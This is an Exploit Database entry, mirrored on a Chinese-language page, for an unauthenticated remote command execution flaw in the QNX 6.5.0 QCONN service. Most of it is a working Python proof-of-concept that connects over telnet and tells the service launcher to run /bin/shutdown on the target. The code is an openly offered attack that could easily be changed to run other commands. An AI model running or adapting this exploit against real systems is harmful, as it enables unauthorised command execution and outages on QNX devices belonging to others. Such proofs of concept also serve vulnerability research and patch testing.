QNX 6.5.0 / QCONN 1.4.207944 – Remote Command Execution

• Exploit Database
• 15 阅读

• 作者： Mor!p3r
  日期： 2012-09-25
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/21520/

• # Title : QNX QCONN Remote Command Execution Vurnerability
  # Version : QNX 6.5.0 >= , QCONN >= 1.4.207944
  # Download: http://www.qnx.com/download/feature.html?programid=23665 (QNX Neutrino 6.5.0 SP1)
  # Vendor : http://www.qnx.com
  # Date : 2012/09/09
  # CVE : N/A
  # Exploit Author : Mor!p3r(moriper[at]gmail.com)
  
  import telnetlib
  import sys
  
  if len(sys.argv) < 3:
  print " "
  print " -----------------------------------------------------"
  print " + Qconn Remote Command Execution PoC (Shutdown) +"
  print " -----------------------------------------------------"
  print " "
  print " + Usage: QCONNRC.py <Target IP> <Port>"
  print "+ Ex> QCONNRC.py 192.168.0.1 8000"
  print ""
  sys.exit(1)
  
  host = sys.argv[1]
  port = int(sys.argv[2])
  attack ="service launcher\n" + "start/flags 8000 /bin/shutdown /bin/shutdown -b\n" + "continue\n"
  telnet = telnetlib.Telnet(host, port)
  telnet.write(attack)
  print "[+] Finish"
  telnet.close()